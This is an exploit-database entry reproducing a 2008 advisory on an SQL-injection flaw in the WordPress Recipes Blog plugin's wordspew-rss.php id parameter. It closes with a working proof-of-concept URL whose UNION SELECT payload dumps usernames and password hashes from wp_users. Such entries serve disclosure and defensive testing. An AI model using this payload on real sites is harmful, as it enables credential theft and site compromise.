WordPress Plugin Recipes Blog - id SQL Injection

2008-02-18T00:00:00
ID EXPLOITPACK:659CC91C9A83CDD92077391E3953BE6E
Type exploitpack
Reporter S@BUN
Modified 2008-02-18T00:00:00

Description

                                        
Source: https://www.securityfocus.com/bid/27856/info

The WordPress Recipes Blog plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data (the id parameter of wordspew-rss.php) before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/plugins/recipe/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users